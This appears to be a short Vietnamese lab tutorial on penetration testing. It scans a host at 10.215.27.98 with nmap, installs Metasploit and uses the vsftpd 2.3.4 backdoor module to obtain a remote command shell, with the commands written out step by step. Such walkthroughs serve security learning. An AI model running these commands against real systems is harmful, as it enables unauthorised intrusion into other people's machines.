1. Yêu cầu:
2. Yêu cầu hệ thống, công cụ:
3. Hướng dẫn:
3.1.Cài đặt và sử dụng NMAP
sudo yum install nmap
Sử dụng NMAP quét các dịch vụ đang chạy trên host
sudo nmap -sV -O -v 10.215.27.98
Kết quả thu được sẽ có port dịch vụ, trạng thái port, tên dịch vụ, version dịch vụ.
Từ các thông tin này search gg để tìm lỗ hổng hiện có của version đó.
Ví dụ: tìm lỗ hổng của dịch vụ FTP: search Vulnerability vsftpd 2.3.4
Tại đây mình sẽ tìm được tên lỗ hổng và cách khai thác và lỗ hổng.
3.2. Cài đặt Metasploit:
mkdir metasploit
cd metasploit
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
sudo chmod +x msfinstall
./msfinstall
msfdb init
msfconsole –version
msfconsole
3.3. Khai thác lỗ hổng vsftpd
Từ kết quả tìm được, có thể xác định vsftpd-2.3.4 tồn tại lỗ hổng Backdoor.
Sử dụng Metasploit để khai thác lỗ hổng này.
Dùng search vsftpd trong Metasploit
Tiến hành khai thác:
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 10.215.27.98
exploit
Vậy là chúng ta đã có thể chạy được command shell của máy remote
